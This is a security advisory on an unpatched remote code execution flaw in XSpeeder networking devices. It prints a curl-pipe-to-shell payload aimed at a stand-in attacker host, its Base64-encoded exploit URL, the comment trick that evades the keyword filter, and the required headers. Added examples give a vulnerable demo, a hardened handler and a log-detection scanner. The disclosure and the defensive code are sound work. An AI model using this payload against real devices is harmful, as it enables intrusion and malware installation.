Advisory

Critical zero-day flaw reported in XSpeeder devices

Take action: If you are using XSpeeder devices, make sure they are isolated from the internet and reachable only from trusted networks. If the vendor continues to ignore this flaw, plan to replace the hardware, because it will only become less safe to use over time.


Learn More

A critical zero-day vulnerability is reported in XSpeeder networking hardware that exposes administrative passwords, internal network maps, user traffic logs, and device configuration files.

The flaw is tracked as CVE-2025-54322 (CVSS score 10.0): an unauthenticated Remote Code Execution (RCE) via the web management interface. With that access, attackers can intercept data, install malware, or pivot into private networks connected to the compromised gear.

The web interface uses a Python-based backend that processes "check ID" (chkid) parameters through a Base64-decoding routine. The decoded data is passed directly to Python's eval(), which executes the input as live code on the device. The firmware attempts to use a "GateKeeper" middleware to filter requests based on time-synchronized headers and simple keyword scans, but the scan checks only that certain strings are present, not what the decoded input does.

The attacker crafts a Python expression that uses __import__ to reach the operating system. To get past the "GateKeeper" keyword scan (which looks for the strings sUserCode and sPwd), they append those strings in a trailing comment: the scan finds them, and eval() ignores them.
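To make the mechanism concrete, here is an added example (written for this advisory, not code from the XSpeeder firmware or from the researchers) that reconstructs the pattern described above in a few lines of Python and places a hardened handler beside it. The function and variable names (h_data, gatekeeper_allows, KNOWN_CHECK_IDS), the sample check IDs and the documentation address standing in for [TARGET_IP] are assumptions; the demo payload is a benign stand-in for the curl|sh command that still reaches the operating system through __import__.

```python
"""Added example, not XSpeeder code: the eval()-on-decoded-input pattern the
advisory describes, beside a hardened handler. Names and sample data are assumed."""
import base64
import os
import re
from urllib.parse import parse_qs, urlencode, urlparse

# The two substrings the advisory says the "GateKeeper" scan looks for.
GATEKEEPER_KEYWORDS = ("sUserCode", "sPwd")

# Constructed sample data for the hardened handler: chkid is an opaque key, not code.
KNOWN_CHECK_IDS = {"chk-1001": "link status", "chk-1002": "wan uptime"}

# The request shown in the advisory, with [TARGET_IP] replaced by a documentation
# address. Decoded for comparison only; never pass it to vulnerable_handler().
ADVISORY_URL = (
    "https://192.0.2.10/?title=any&oIp=any&chkid="
    "X19pbXBvcnRfXygnb3MnKS5zeXN0ZW0oJ2N1cmwgaHR0cDovL2F0dGFja2VyLmNvbS9tYWx3YXJlIHwgc2gnKSAjc1VzZXJDb2RlIHNQd2Q="
)


def gatekeeper_allows(decoded: str) -> bool:
    """Keyword scan as described: passes if both strings appear anywhere in the input."""
    return all(word in decoded for word in GATEKEEPER_KEYWORDS)


def vulnerable_handler(url: str):
    """Base64-decode chkid and hand the result to eval(), as the page says the firmware does."""
    h_data = parse_qs(urlparse(url).query)
    if len(h_data) != 3:                      # the len(hData) == 3 check from the advisory
        return "rejected: wrong parameter count"
    decoded = base64.b64decode(h_data["chkid"][0]).decode()
    if not gatekeeper_allows(decoded):
        return "rejected: gatekeeper"
    return eval(decoded)                      # noqa: S307 -- the flaw: input becomes code


def hardened_handler(url: str):
    """Treat chkid as an identifier: strict decode, strict shape, table lookup, no eval()."""
    h_data = parse_qs(urlparse(url).query)
    if set(h_data) != {"title", "oIp", "chkid"}:
        return "rejected: unexpected parameters"
    try:
        decoded = base64.b64decode(h_data["chkid"][0], validate=True).decode("ascii")
    except (ValueError, UnicodeDecodeError):
        return "rejected: chkid is not valid base64"
    if not re.fullmatch(r"chk-[0-9]{4}", decoded):   # allow-list the shape, not keywords
        return "rejected: chkid format"
    return KNOWN_CHECK_IDS.get(decoded, "rejected: unknown check id")


def build_url(payload: str, host: str = "192.0.2.10") -> str:
    """Encode a chkid value the way the advisory shows, with the two filler parameters."""
    chkid = base64.b64encode(payload.encode()).decode()
    return f"https://{host}/?" + urlencode({"title": "any", "oIp": "any", "chkid": chkid})


def run_demo() -> dict:
    # Benign stand-in for the curl|sh payload: it still reaches os via __import__, and the
    # trailing comment carries both keywords so the substring scan passes.
    payload = "__import__('os').getpid() #sUserCode sPwd"
    url = build_url(payload)
    return {
        "vulnerable": vulnerable_handler(url),            # eval() ran the payload
        "pid": os.getpid(),                               # what the payload should return
        "hardened": hardened_handler(url),                # same request, rejected on shape
        "legit": hardened_handler(build_url("chk-1001")), # a real check ID still works
    }


if __name__ == "__main__":
    for key, value in run_demo().items():
        print(f"{key}: {value}")
```

The point of the hardened handler is that it never asks "does the input contain the right words?"; it asks "is the input exactly the kind of value this parameter may hold?", and it resolves that value by lookup rather than evaluation. A keyword scan in front of eval() can always be satisfied by a comment or a string literal.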

__import__('os').system('curl http://attacker.com/malware | sh') #sUserCode sPwd

This raw string is then encoded into Base64 to be passed through the chkid URL parameter:

X19pbXBvcnRfXygnb3MnKS5zeXN0ZW0oJ2N1cmwgaHR0cDovL2F0dGFja2VyLmNvbS9tYWx3YXJlIHwgc2gnKSAjc1VzZXJDb2RlIHNQd2Q=

To trigger the RCE, the request must carry exactly three query parameters (title, oIp and chkid) to pass the len(hData) == 3 check observed in the firmware; the first two can hold any value.

https://[TARGET_IP]/?title=any&oIp=any&chkid=X19pbXBvcnRfXygnb3MnKS5zeXN0ZW0oJ2N1cmwgaHR0cDovL2F0dGFja2VyLmNvbS9tYWx3YXJlIHwgc2gnKSAjc1VzZXJDb2RlIHNQd2Q=

For this string to work against a real device, the request must also include the specific headers identified in the research:

  • User-Agent: must contain the string SXZ.
  • X-SXZ-R: a dynamic value derived from the current minute (time.time()/60 % 7), so it must be computed at send time.
  • Cookie: a valid sessionid obtained from the /webInfos/ endpoint.
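For defenders who cannot patch, the following added example (not from the advisory or its researchers) shows how the request shape described above can be flagged in web-server or reverse-proxy logs. The JSON-per-line log format, the field names, the sample entries and the addresses are constructed for this example; the advisory's own chkid value is decoded for matching and never executed. Because the X-SXZ-R value is time-derived, only its presence is used as a signal here.

```python
"""Added example, not from the advisory: flag log entries that match the exploit shape.
Log format, field names and sample entries are constructed for this example."""
import base64
import binascii
import json
import re
from urllib.parse import parse_qs, urlparse

# The chkid value printed in the advisory (decoded here for matching, never executed).
ADVISORY_CHKID = (
    "X19pbXBvcnRfXygnb3MnKS5zeXN0ZW0oJ2N1cmwgaHR0cDovL2F0dGFja2VyLmNvbS9tYWx3YXJlIHwgc2gnKSAjc1VzZXJDb2RlIHNQd2Q="
)

# Constructed sample log: one JSON object per line, with fields a reverse proxy might record.
SAMPLE_LOG = "\n".join([
    json.dumps({"src": "203.0.113.7", "ua": "Mozilla/5.0 SXZ", "x_sxz_r": "3",
                "url": "https://198.51.100.2/?title=any&oIp=any&chkid=" + ADVISORY_CHKID}),
    json.dumps({"src": "198.51.100.9", "ua": "Mozilla/5.0",
                "url": "https://198.51.100.2/?title=status&oIp=10.0.0.1&chkid=Y2hrLTEwMDE="}),
    json.dumps({"src": "198.51.100.9", "ua": "Mozilla/5.0",
                "url": "https://198.51.100.2/webInfos/"}),
])

# Substrings that should never appear in a decoded "check ID"; a match is a strong signal.
CODE_MARKERS = ("__import__", "eval(", "exec(", ".system(", "subprocess", "| sh")
# The keyword-in-a-comment trick the advisory describes.
BYPASS_COMMENT = re.compile(r"#.*sUserCode.*sPwd")


def decode_chkid(value):
    """Strict Base64 decode; returns None when the value is not valid Base64."""
    try:
        return base64.b64decode(value, validate=True).decode("utf-8", "replace")
    except (binascii.Error, ValueError):
        return None


def analyse(entry):
    """Classify one log entry. Strong signals alone give 'high'; two supporting ones give 'medium'."""
    params = parse_qs(urlparse(entry["url"]).query)
    chkid = params.get("chkid", [None])[0]
    if chkid is None:
        return {"severity": "none", "reasons": []}
    strong, supporting = [], []
    decoded = decode_chkid(chkid)
    if decoded is None:
        supporting.append("chkid is not valid base64")
    else:
        hits = [marker for marker in CODE_MARKERS if marker in decoded]
        if hits:
            strong.append("decoded chkid contains code: " + ", ".join(hits))
        if BYPASS_COMMENT.search(decoded):
            strong.append("GateKeeper keywords hidden in a trailing comment")
    if set(params) == {"title", "oIp", "chkid"}:
        supporting.append("exactly the three parameters the exploit needs")
    if "SXZ" in entry.get("ua", ""):
        supporting.append("User-Agent contains SXZ")
    if "x_sxz_r" in entry:                     # value is time-derived; presence is the signal
        supporting.append("X-SXZ-R header present")
    if strong:
        severity = "high"
    elif len(supporting) >= 2:
        severity = "medium"
    else:
        severity = "none"
    return {"severity": severity, "reasons": strong + supporting}


def scan(log_text):
    """Return {line_number: result} for every entry that is not 'none'."""
    findings = {}
    for lineno, line in enumerate(log_text.splitlines(), start=1):
        result = analyse(json.loads(line))
        if result["severity"] != "none":
            findings[lineno] = result
    return findings


if __name__ == "__main__":
    for lineno, result in scan(SAMPLE_LOG).items():
        print(f"line {lineno}: {result['severity']}: " + "; ".join(result["reasons"]))
```

Run against the constructed sample, only the first entry is flagged (high), because its decoded chkid contains __import__, .system( and a shell pipe, and the keywords sit in a comment; the legitimate-looking second entry shares the three-parameter shape but decodes to a plain identifier and is left alone. Decoding before matching matters: a rule that only inspects the raw URL would have to know the Base64 form of every possible payload.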

Security researchers discovered the flaw and attempted to notify the vendor. The manufacturer has ignored all alerts, so no patch is available, and the researchers expect the flaw to remain unpatched for the foreseeable future.

Because the vulnerability sits in the web management interface, any device whose management interface is reachable from the public internet is at risk. Public scanning tools such as Shodan show approximately 70,000 exposed devices, most of them in residential and small-business environments.

Security analysts recommend that owners of XSpeeder equipment immediately disable remote management and restrict the web interface to trusted networks. If the device is not essential, replace it with hardware from a vendor that actively maintains its firmware.
